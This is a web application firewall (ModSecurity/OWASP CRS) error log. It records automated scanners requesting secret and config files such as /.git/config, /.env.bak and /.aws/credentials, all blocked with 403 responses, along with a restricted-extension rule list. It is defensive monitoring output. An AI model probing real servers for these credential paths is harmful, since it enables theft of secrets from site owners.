[Mon Dec 16 03:21:01.989553 2024] [:error] [pid 4019430] [client 93.123.109.193:51690] [client 93.123.109.193] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z1-OjUN8vtld7Iw49QRVmgAAAAQ"]
[Mon Dec 16 03:21:01.991137 2024] [:error] [pid 4019430] [client 93.123.109.193:51690] [client 93.123.109.193] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z1-OjUN8vtld7Iw49QRVmgAAAAQ"]
[Mon Dec 16 03:21:01.991566 2024] [:error] [pid 4019430] [client 93.123.109.193:51690] [client 93.123.109.193] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z1-OjUN8vtld7Iw49QRVmgAAAAQ"]
[Mon Dec 16 08:41:03.763874 2024] [:error] [pid 4019426] [client 45.148.10.86:49780] [client 45.148.10.86] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z1_Zj_SKBwbTqfEFGXK6KwAAAAA"]
[Mon Dec 16 08:41:03.764209 2024] [:error] [pid 4019426] [client 45.148.10.86:49780] [client 45.148.10.86] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z1_Zj_SKBwbTqfEFGXK6KwAAAAA"]
[Mon Dec 16 08:41:03.764404 2024] [:error] [pid 4019426] [client 45.148.10.86:49780] [client 45.148.10.86] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z1_Zj_SKBwbTqfEFGXK6KwAAAAA"]
[Mon Dec 16 08:41:07.775814 2024] [:error] [pid 4019448] [client 45.148.10.86:49792] [client 45.148.10.86] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z1_Zk4BHQYf9iM3XGb-3gwAAAAU"]
[Mon Dec 16 08:41:07.776409 2024] [:error] [pid 4019448] [client 45.148.10.86:49792] [client 45.148.10.86] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z1_Zk4BHQYf9iM3XGb-3gwAAAAU"]
[Mon Dec 16 08:41:07.776770 2024] [:error] [pid 4019448] [client 45.148.10.86:49792] [client 45.148.10.86] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z1_Zk4BHQYf9iM3XGb-3gwAAAAU"]
[Tue Dec 17 08:47:06.672712 2024] [:error] [pid 4040676] [client 45.148.10.80:52126] [client 45.148.10.80] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z2EseioUCrngY3t_G44ZZAAAAAU"]
[Tue Dec 17 08:47:06.674415 2024] [:error] [pid 4040676] [client 45.148.10.80:52126] [client 45.148.10.80] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z2EseioUCrngY3t_G44ZZAAAAAU"]
[Tue Dec 17 08:47:06.675029 2024] [:error] [pid 4040676] [client 45.148.10.80:52126] [client 45.148.10.80] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z2EseioUCrngY3t_G44ZZAAAAAU"]
[Tue Dec 17 08:47:09.009858 2024] [:error] [pid 4042110] [client 45.148.10.80:50984] [client 45.148.10.80] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z2EsfQ3iqju2jZZaf-iafgAAAAg"]
[Tue Dec 17 08:47:09.010702 2024] [:error] [pid 4042110] [client 45.148.10.80:50984] [client 45.148.10.80] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z2EsfQ3iqju2jZZaf-iafgAAAAg"]
[Tue Dec 17 08:47:09.011252 2024] [:error] [pid 4042110] [client 45.148.10.80:50984] [client 45.148.10.80] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z2EsfQ3iqju2jZZaf-iafgAAAAg"]
[Sat Dec 21 17:02:40.408686 2024] [:error] [pid 4138918] [client 103.150.186.126:59592] [client 103.150.186.126] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "Z2bmoGUK8q8KIRcj6sGoWgAAAAM"]
[Sat Dec 21 17:02:40.410436 2024] [:error] [pid 4138918] [client 103.150.186.126:59592] [client 103.150.186.126] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "Z2bmoGUK8q8KIRcj6sGoWgAAAAM"]
[Sat Dec 21 17:02:40.411184 2024] [:error] [pid 4138918] [client 103.150.186.126:59592] [client 103.150.186.126] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "Z2bmoGUK8q8KIRcj6sGoWgAAAAM"]
[Sat Dec 21 17:02:40.411675 2024] [:error] [pid 4138918] [client 103.150.186.126:59592] [client 103.150.186.126] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "Z2bmoGUK8q8KIRcj6sGoWgAAAAM"]
[Sat Dec 21 17:02:43.928340 2024] [:error] [pid 4138917] [client 103.150.186.126:59622] [client 103.150.186.126] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z2bmo_PSG1c4p72-y3_nLgAAAAI"]
[Sat Dec 21 17:02:43.929107 2024] [:error] [pid 4138917] [client 103.150.186.126:59622] [client 103.150.186.126] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z2bmo_PSG1c4p72-y3_nLgAAAAI"]
[Sat Dec 21 17:02:43.929654 2024] [:error] [pid 4138917] [client 103.150.186.126:59622] [client 103.150.186.126] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z2bmo_PSG1c4p72-y3_nLgAAAAI"]
[Sat Dec 21 17:02:46.466287 2024] [:error] [pid 4139141] [client 103.150.186.126:59640] [client 103.150.186.126] ModSecurity: Warning. Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "177"] [id "920170"] [msg "GET or HEAD Request with Body Content."] [data "14"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "Z2bmpnh8HsUjZ4XBK6yV2AAAAAc"]
[Sat Dec 21 17:02:46.467504 2024] [:error] [pid 4139141] [client 103.150.186.126:59640] [client 103.150.186.126] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "Z2bmpnh8HsUjZ4XBK6yV2AAAAAc"]
[Sat Dec 21 17:02:46.467803 2024] [:error] [pid 4139141] [client 103.150.186.126:59640] [client 103.150.186.126] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "Z2bmpnh8HsUjZ4XBK6yV2AAAAAc"]
[Sat Dec 21 18:29:14.079927 2024] [:error] [pid 4139141] [client 185.40.4.127:33692] [client 185.40.4.127] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "Z2b66nh8HsUjZ4XBK6yV3AAAAAc"]
[Sat Dec 21 18:29:14.080438 2024] [:error] [pid 4139141] [client 185.40.4.127:33692] [client 185.40.4.127] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "Z2b66nh8HsUjZ4XBK6yV3AAAAAc"]
[Sat Dec 21 18:29:14.080860 2024] [:error] [pid 4139141] [client 185.40.4.127:33692] [client 185.40.4.127] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "Z2b66nh8HsUjZ4XBK6yV3AAAAAc"]
[Sat Dec 21 18:29:16.661039 2024] [:error] [pid 4138919] [client 212.21.66.6:41213] [client 212.21.66.6] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z2b67HfTzEe42s21yWupsgAAAAQ"]
[Sat Dec 21 18:29:16.661262 2024] [:error] [pid 4138919] [client 212.21.66.6:41213] [client 212.21.66.6] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z2b67HfTzEe42s21yWupsgAAAAQ"]
[Sat Dec 21 18:29:16.661471 2024] [:error] [pid 4138919] [client 212.21.66.6:41213] [client 212.21.66.6] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z2b67HfTzEe42s21yWupsgAAAAQ"]
[Sat Dec 21 23:01:34.587599 2024] [:error] [pid 4156250] [client 54.234.30.149:60476] [client 54.234.30.149] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z2c6vli37JoUrIGxKKW9IgAAAAg"]
[Sat Dec 21 23:01:34.588602 2024] [:error] [pid 4156250] [client 54.234.30.149:60476] [client 54.234.30.149] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z2c6vli37JoUrIGxKKW9IgAAAAg"]
[Sat Dec 21 23:01:34.589258 2024] [:error] [pid 4156250] [client 54.234.30.149:60476] [client 54.234.30.149] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z2c6vli37JoUrIGxKKW9IgAAAAg"]
[Mon Dec 30 11:27:33.726408 2024] [:error] [pid 135564] [client 44.203.247.221:58670] [client 44.203.247.221] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z3J1ldKE20tyYF1f-KPhvQAAAAs"]
[Mon Dec 30 11:27:33.728424 2024] [:error] [pid 135564] [client 44.203.247.221:58670] [client 44.203.247.221] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z3J1ldKE20tyYF1f-KPhvQAAAAs"]
[Mon Dec 30 11:27:33.728904 2024] [:error] [pid 135564] [client 44.203.247.221:58670] [client 44.203.247.221] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z3J1ldKE20tyYF1f-KPhvQAAAAs"]
[Sat Jan 04 06:20:07.734363 2025] [:error] [pid 243637] [client 45.141.215.116:36744] [client 45.141.215.116] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z3jFB9txrB9RU3J-QwcBHAAAAAI"]
[Sat Jan 04 06:20:07.736098 2025] [:error] [pid 243637] [client 45.141.215.116:36744] [client 45.141.215.116] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z3jFB9txrB9RU3J-QwcBHAAAAAI"]
